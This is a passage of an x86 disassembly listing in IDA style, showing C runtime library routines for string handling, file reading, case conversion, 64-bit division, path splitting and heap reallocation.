xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_418C99
test dl, dl
jz short loc_418CEB
test dh, dh
jz short loc_418CE1
test edx, 0FF0000h
jz short loc_418CD7
test edx, 0FF000000h
jnz short loc_418C99
mov [edi], edx
jmp short loc_418CEF
; ---------------------------------------------------------------------------
loc_418CD7: ; CODE XREF: sub_418C10+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_418CEF
; ---------------------------------------------------------------------------
loc_418CE1: ; CODE XREF: sub_418C10+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_418CEF
; ---------------------------------------------------------------------------
loc_418CEB: ; CODE XREF: sub_418C10+AD�j
xor edx, edx
mov [edi], edx
loc_418CEF: ; CODE XREF: sub_418C10+C5�j
; sub_418C10+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_418D01
loc_418CF7: ; CODE XREF: sub_418C10+79�j
xor eax, eax
loc_418CF9: ; CODE XREF: sub_418C10+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_418CF9
loc_418D01: ; CODE XREF: sub_418C10+E5�j
and ebx, 3
jnz short loc_418C8B
loc_418D06: ; CODE XREF: sub_418C10+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_418C10 endp
; =============== S U B R O U T I N E =======================================
sub_418D0E proc near ; CODE XREF: sub_406C19+2E2�p
; sub_406C19+435�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_418D8A
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_418D2D
cmp edi, 1
jz short loc_418D2D
cmp edi, 2
jnz short loc_418D8A
loc_418D2D: ; CODE XREF: sub_418D0E+13�j
; sub_418D0E+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_418D44
push esi
call sub_41E5B1
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_418D44: ; CODE XREF: sub_418D0E+27�j
push esi
call sub_41A7D0
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_418D59
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_418D6D
; ---------------------------------------------------------------------------
loc_418D59: ; CODE XREF: sub_418D0E+42�j
test al, 1
jz short loc_418D6D
test al, 8
jz short loc_418D6D
test ah, 4
jnz short loc_418D6D
mov dword ptr [esi+18h], 200h
loc_418D6D: ; CODE XREF: sub_418D0E+49�j
; sub_418D0E+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41E517
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_418D97
; ---------------------------------------------------------------------------
loc_418D8A: ; CODE XREF: sub_418D0E+B�j
; sub_418D0E+1D�j
mov ds:dword_4CD9B4, 16h
or eax, 0FFFFFFFFh
loc_418D97: ; CODE XREF: sub_418D0E+7A�j
pop edi
pop esi
retn
sub_418D0E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418DA0 proc near ; CODE XREF: sub_406C19+2AC�p
; sub_406C19+2CD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_418DD1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_418DCF
jz short loc_418DD1
dec ecx
dec ecx
loc_418DCF: ; CODE XREF: sub_418DA0+29�j
not ecx
loc_418DD1: ; CODE XREF: sub_418DA0+9�j
; sub_418DA0+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_418DA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418DE0 proc near ; CODE XREF: sub_407110+5C�p
; sub_407110+9C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_418E94
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_418E0A
loc_418DFB: ; CODE XREF: sub_418DE0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_418E3B
test edi, 3
jnz short loc_418DFB
loc_418E0A: ; CODE XREF: sub_418DE0+19�j
; sub_418DE0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_418E0A
mov eax, [edi-4]
test al, al
jz short loc_418E48
test ah, ah
jz short loc_418E43
test eax, 0FF0000h
jz short loc_418E3E
test eax, 0FF000000h
jnz short loc_418E0A
loc_418E3B: ; CODE XREF: sub_418DE0+20�j
dec edi
jmp short loc_418E4B
; ---------------------------------------------------------------------------
loc_418E3E: ; CODE XREF: sub_418DE0+52�j
sub edi, 2
jmp short loc_418E4B
; ---------------------------------------------------------------------------
loc_418E43: ; CODE XREF: sub_418DE0+4B�j
sub edi, 3
jmp short loc_418E4B
; ---------------------------------------------------------------------------
loc_418E48: ; CODE XREF: sub_418DE0+47�j
sub edi, 4
loc_418E4B: ; CODE XREF: sub_418DE0+5C�j
; sub_418DE0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_418E60
mov ebx, ecx
shr ecx, 2
jnz short loc_418EAC
jmp short loc_418E7C
; ---------------------------------------------------------------------------
loc_418E60: ; CODE XREF: sub_418DE0+75�j
; sub_418DE0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_418E9A
mov [edi], dl
inc edi
dec ecx
jz short loc_418E90
test esi, 3
jnz short loc_418E60
mov ebx, ecx
shr ecx, 2
jnz short loc_418EAC
loc_418E7C: ; CODE XREF: sub_418DE0+7E�j
; sub_418DE0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_418E90
loc_418E83: ; CODE XREF: sub_418DE0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_418E92
dec ecx
jnz short loc_418E83
loc_418E90: ; CODE XREF: sub_418DE0+8B�j
; sub_418DE0+A1�j
mov [edi], cl
loc_418E92: ; CODE XREF: sub_418DE0+AB�j
pop ebx
pop esi
loc_418E94: ; CODE XREF: sub_418DE0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_418E9A: ; CODE XREF: sub_418DE0+85�j
; sub_418DE0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_418EA4: ; CODE XREF: sub_418DE0+E4�j
; sub_418DE0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_418E7C
loc_418EAC: ; CODE XREF: sub_418DE0+7C�j
; sub_418DE0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_418EA4
test dl, dl
jz short loc_418E9A
test dh, dh
jz short loc_418EF8
test edx, 0FF0000h
jz short loc_418EE8
test edx, 0FF000000h
jnz short loc_418EA4
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_418EE8: ; CODE XREF: sub_418DE0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_418EF8: ; CODE XREF: sub_418DE0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_418DE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F10 proc near ; CODE XREF: sub_407252+2A2�p
; sub_40EE72+31DB�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_418F31
xor eax, eax
jmp short loc_418F33
; ---------------------------------------------------------------------------
loc_418F31: ; CODE XREF: sub_418F10+1B�j
mov eax, edi
loc_418F33: ; CODE XREF: sub_418F10+1F�j
cld
pop edi
leave
retn
sub_418F10 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_418F50
loc_418F40: ; CODE XREF: sub_418F50+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_418F50
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418F50 proc near ; CODE XREF: sub_408C26+DB�p
; sub_40DAF0+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00418F40 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_418F56: ; CODE XREF: sub_417880+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_418F7B
loc_418F68: ; CODE XREF: sub_418F50+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_418F40
test cl, cl
jz short loc_418FC4
test edx, 3
jnz short loc_418F68
loc_418F7B: ; CODE XREF: sub_418F50+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_418F86: ; CODE XREF: sub_418F50+61�j
; sub_418F50+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_418FC8
and eax, 81010100h
jz short loc_418F86
and eax, 1010100h
jnz short loc_418FC2
and esi, 80000000h
jnz short loc_418F86
loc_418FC2: ; CODE XREF: sub_418F50+68�j
; sub_418F50+81�j ...
pop esi
pop edi
loc_418FC4: ; CODE XREF: sub_418F50+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_418FC8: ; CODE XREF: sub_418F50+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_419005
test al, al
jz short loc_418FC2
cmp ah, bl
jz short loc_418FFE
test ah, ah
jz short loc_418FC2
shr eax, 10h
cmp al, bl
jz short loc_418FF7
test al, al
jz short loc_418FC2
cmp ah, bl
jz short loc_418FF0
test ah, ah
jz short loc_418FC2
jmp short loc_418F86
; ---------------------------------------------------------------------------
loc_418FF0: ; CODE XREF: sub_418F50+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_418FF7: ; CODE XREF: sub_418F50+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_418FFE: ; CODE XREF: sub_418F50+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419005: ; CODE XREF: sub_418F50+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_418F50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41900C proc near ; CODE XREF: sub_408C26+AF�p
; sub_40EE72+47F2�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_419020
xor eax, eax
jmp short loc_419056
; ---------------------------------------------------------------------------
loc_419020: ; CODE XREF: sub_41900C+E�j
dec [ebp+arg_4]
push esi
jz short loc_419050
mov esi, [ebp+arg_8]
loc_419029: ; CODE XREF: sub_41900C+42�j
dec dword ptr [esi+4]
js short loc_419038
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41903F
; ---------------------------------------------------------------------------
loc_419038: ; CODE XREF: sub_41900C+20�j
push esi
call sub_41E248
pop ecx
loc_41903F: ; CODE XREF: sub_41900C+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_41905A
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_419050
dec [ebp+arg_4]
jnz short loc_419029
loc_419050: ; CODE XREF: sub_41900C+18�j
; sub_41900C+3D�j ...
and byte ptr [edi], 0
loc_419053: ; CODE XREF: sub_41900C+55�j
mov eax, ebx
pop esi
loc_419056: ; CODE XREF: sub_41900C+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41905A: ; CODE XREF: sub_41900C+36�j
cmp edi, [ebp+arg_0]
jnz short loc_419050
xor ebx, ebx
jmp short loc_419053
sub_41900C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419063 proc near ; CODE XREF: sub_409209+BF�p
; sub_409209+12C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4CDA48
push ebx
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_4], ebx
jnz short loc_419097
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz short loc_4190FE
loc_41907F: ; CODE XREF: sub_419063+30�j
mov cl, [edx]
cmp cl, 61h
jl short loc_419090
cmp cl, 7Ah
jg short loc_419090
sub cl, 20h
mov [edx], cl
loc_419090: ; CODE XREF: sub_419063+21�j
; sub_419063+26�j
inc edx
cmp [edx], bl
jnz short loc_41907F
jmp short loc_4190FE
; ---------------------------------------------------------------------------
loc_419097: ; CODE XREF: sub_419063+11�j
push esi
push edi
push 1
push ebx
push ebx
push ebx
push 0FFFFFFFFh
mov esi, 200h
push [ebp+arg_0]
push esi
push eax
call sub_41E709
mov edi, eax
add esp, 20h
cmp edi, ebx
jz short loc_4190F0
push edi
call sub_417B89
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_4190F0
push 1
push ebx
push edi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push ds:dword_4CDA48
call sub_41E709
add esp, 20h
test eax, eax
jz short loc_4190F0
push [ebp+var_4]
push [ebp+arg_0]
call sub_4179C0
pop ecx
pop ecx
loc_4190F0: ; CODE XREF: sub_419063+53�j
; sub_419063+61�j ...
push [ebp+var_4]
call sub_417C3B
mov eax, [ebp+arg_0]
pop ecx
pop edi
pop esi
loc_4190FE: ; CODE XREF: sub_419063+1A�j
; sub_419063+32�j
pop ebx
leave
retn
sub_419063 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419101 proc near ; CODE XREF: sub_40A951+6�p
; sub_40A96F+4A�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4CDA48, 0
push ebx
push esi
push edi
jnz short loc_41912E
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4191C7
cmp eax, 5Ah
jg loc_4191C7
add eax, 20h
jmp loc_4191C7
; ---------------------------------------------------------------------------
loc_41912E: ; CODE XREF: sub_419101+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_419162
cmp ds:dword_433E7C, esi
jle short loc_419150
push esi
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41915A
; ---------------------------------------------------------------------------
loc_419150: ; CODE XREF: sub_419101+42�j
mov eax, ds:off_433C70
mov al, [eax+ebx*2]
and eax, esi
loc_41915A: ; CODE XREF: sub_419101+4D�j
test eax, eax
jnz short loc_419162
loc_41915E: ; CODE XREF: sub_419101+AD�j
mov eax, ebx
jmp short loc_4191C7
; ---------------------------------------------------------------------------
loc_419162: ; CODE XREF: sub_419101+3A�j
; sub_419101+5B�j
mov edx, ds:off_433C70
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_419186
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_41918F
; ---------------------------------------------------------------------------
loc_419186: ; CODE XREF: sub_419101+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_41918F: ; CODE XREF: sub_419101+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_4CDA48
call sub_41E709
add esp, 20h
test eax, eax
jz short loc_41915E
cmp eax, esi
jnz short loc_4191BA
movzx eax, [ebp+var_4]
jmp short loc_4191C7
; ---------------------------------------------------------------------------
loc_4191BA: ; CODE XREF: sub_419101+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4191C7: ; CODE XREF: sub_419101+16�j
; sub_419101+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419101 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4191D0 proc near ; CODE XREF: sub_40B822+3D�p
; sub_40D01A+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_4191F1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_419241
; ---------------------------------------------------------------------------
loc_4191F1: ; CODE XREF: sub_4191D0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_4191FF: ; CODE XREF: sub_4191D0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4191FF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41922A
cmp edx, [esp+4+arg_4]
ja short loc_41922A
jb short loc_419232
cmp eax, [esp+4+arg_0]
jbe short loc_419232
loc_41922A: ; CODE XREF: sub_4191D0+4A�j
; sub_4191D0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_419232: ; CODE XREF: sub_4191D0+52�j
; sub_4191D0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_419241: ; CODE XREF: sub_4191D0+1F�j
pop ebx
retn 10h
sub_4191D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419250 proc near ; CODE XREF: sub_40B822+24�p
; sub_40D01A+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_419272
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4192B3
; ---------------------------------------------------------------------------
loc_419272: ; CODE XREF: sub_419250+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_419280: ; CODE XREF: sub_419250+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_419280
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4192AE
cmp edx, [esp+8+arg_4]
ja short loc_4192AE
jb short loc_4192AF
cmp eax, [esp+8+arg_0]
jbe short loc_4192AF
loc_4192AE: ; CODE XREF: sub_419250+4E�j
; sub_419250+54�j
dec esi
loc_4192AF: ; CODE XREF: sub_419250+56�j
; sub_419250+5C�j
xor edx, edx
mov eax, esi
loc_4192B3: ; CODE XREF: sub_419250+20�j
pop esi
pop ebx
retn 10h
sub_419250 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192B8 proc near ; CODE XREF: sub_40B8D8+1E3�p
; sub_40E6A9+F7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_417AB0
cmp eax, 1
pop ecx
jb short loc_4192F3
cmp byte ptr [ebx+1], 3Ah
jnz short loc_4192F3
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_4192EF
push 2
push ebx
push esi
call sub_41ED0D
add esp, 0Ch
and byte ptr [esi+2], 0
loc_4192EF: ; CODE XREF: sub_4192B8+25�j
inc ebx
inc ebx
jmp short loc_4192FD
; ---------------------------------------------------------------------------
loc_4192F3: ; CODE XREF: sub_4192B8+18�j
; sub_4192B8+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4192FD
and byte ptr [eax], 0
loc_4192FD: ; CODE XREF: sub_4192B8+39�j
; sub_4192B8+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_419375
loc_419310: ; CODE XREF: sub_4192B8+87�j
mov cl, [eax]
movzx edx, cl
test ds:byte_4CEF01[edx], 4
jz short loc_419321
inc eax
jmp short loc_41933B
; ---------------------------------------------------------------------------
loc_419321: ; CODE XREF: sub_4192B8+64�j
cmp cl, 2Fh
jz short loc_419335
cmp cl, 5Ch
jz short loc_419335
cmp cl, 2Eh
jnz short loc_41933B
mov [ebp+var_4], eax
jmp short loc_41933B
; ---------------------------------------------------------------------------
loc_419335: ; CODE XREF: sub_4192B8+6C�j
; sub_4192B8+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_41933B: ; CODE XREF: sub_4192B8+67�j
; sub_4192B8+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_419310
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_419375
cmp [ebp+arg_8], 0
jz short loc_419370
sub edi, ebx
cmp edi, esi
jb short loc_419359
mov edi, esi
loc_419359: ; CODE XREF: sub_4192B8+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_41ED0D
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_419370: ; CODE XREF: sub_4192B8+97�j
mov ebx, [ebp+arg_4]
jmp short loc_41937F
; ---------------------------------------------------------------------------
loc_419375: ; CODE XREF: sub_4192B8+56�j
; sub_4192B8+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41937F
and byte ptr [ecx], 0
loc_41937F: ; CODE XREF: sub_4192B8+BB�j
; sub_4192B8+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_4193D2
cmp edi, ebx
jb short loc_4193D2
cmp [ebp+arg_C], 0
jz short loc_4193AF
sub edi, ebx
cmp edi, esi
jb short loc_419398
mov edi, esi
loc_419398: ; CODE XREF: sub_4192B8+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_41ED0D
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4193AF: ; CODE XREF: sub_4192B8+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_4193FA
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_4193BF
mov esi, eax
loc_4193BF: ; CODE XREF: sub_4192B8+103�j
push esi
push [ebp+var_4]
push edi
call sub_41ED0D
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_4193FA
; ---------------------------------------------------------------------------
loc_4193D2: ; CODE XREF: sub_4192B8+CC�j
; sub_4192B8+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_4193F0
sub eax, ebx
cmp eax, esi
jnb short loc_4193E1
mov esi, eax
loc_4193E1: ; CODE XREF: sub_4192B8+125�j
push esi
push ebx
push edi
call sub_41ED0D
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_4193F0: ; CODE XREF: sub_4192B8+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_4193FA
and byte ptr [eax], 0
loc_4193FA: ; CODE XREF: sub_4192B8+FC�j
; sub_4192B8+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4192B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4193FF proc near ; CODE XREF: sub_40BFE1+19�p
; sub_40D633+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_419E38
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41943D
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41944A
; ---------------------------------------------------------------------------
loc_41943D: ; CODE XREF: sub_4193FF+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_419D23
pop ecx
pop ecx
loc_41944A: ; CODE XREF: sub_4193FF+3C�j
mov eax, esi
pop esi
leave
retn
sub_4193FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41944F proc near ; CODE XREF: sub_40C259+2E�p
; sub_418603+35�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jnz short loc_41946A
push [ebp+arg_4]
call sub_417B89
pop ecx
jmp loc_4196EA
; ---------------------------------------------------------------------------
loc_41946A: ; CODE XREF: sub_41944F+B�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_41947F
push [ebp+arg_0]
call sub_417C3B
pop ecx
jmp loc_4196E8
; ---------------------------------------------------------------------------
loc_41947F: ; CODE XREF: sub_41944F+20�j
mov eax, ds:dword_4CF028
cmp eax, 3
jnz loc_41958F
loc_41948D: ; CODE XREF: sub_41944F+12E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41956B
push [ebp+arg_0]
call sub_41AD89
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_419546
cmp esi, ds:dword_4CF020
ja short loc_4194FF
mov edi, [ebp+arg_0]
push esi
push edi
push ebx
call sub_41B592
add esp, 0Ch
test eax, eax
jnz short loc_4194FB
push esi
call sub_41B0DD
mov edi, eax
pop ecx
test edi, edi
jz short loc_4194FF
mov ebx, [ebp+arg_0]
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_4194DF
mov eax, esi
loc_4194DF: ; CODE XREF: sub_41944F+8C�j
push eax
push ebx
push edi
call sub_417390
push ebx
call sub_41AD89
push [ebp+arg_0]
mov ebx, eax
push ebx
call sub_41ADB4
add esp, 18h
loc_4194FB: ; CODE XREF: sub_41944F+74�j
test edi, edi
jnz short loc_419542
loc_4194FF: ; CODE XREF: sub_41944F+62�j
; sub_41944F+81�j
test esi, esi
jnz short loc_419506
push 1
pop esi
loc_419506: ; CODE XREF: sub_41944F+B2�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_4CF024
call ds:dword_4240E8 ;; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_419542
mov ecx, [ebp+arg_0]
mov eax, [ecx-4]
dec eax
cmp eax, esi
jb short loc_41952E
mov eax, esi
loc_41952E: ; CODE XREF: sub_41944F+DB�j
push eax
push ecx
push edi
call sub_417390
push [ebp+arg_0]
push ebx
call sub_41ADB4
add esp, 14h
loc_419542: ; CODE XREF: sub_41944F+AE�j
; sub_41944F+D0�j
test ebx, ebx
jnz short loc_419567
loc_419546: ; CODE XREF: sub_41944F+56�j
test esi, esi
jnz short loc_41954D
push 1
pop esi
loc_41954D: ; CODE XREF: sub_41944F+F9�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push ds:dword_4CF024
call ds:dword_424194 ;; RtlReAllocateHeap
mov edi, eax
loc_419567: ; CODE XREF: sub_41944F+F5�j
test edi, edi
jnz short loc_419588
loc_41956B: ; CODE XREF: sub_41944F+43�j
cmp ds:dword_4CDA14, 0
jz short loc_419588
push esi
call sub_41AB54
test eax, eax
pop ecx
jnz loc_41948D
jmp loc_4196E8
; ---------------------------------------------------------------------------
loc_419588: ; CODE XREF: sub_41944F+11A�j
; sub_41944F+123�j ...
mov eax, edi
jmp loc_4196EA
; ---------------------------------------------------------------------------
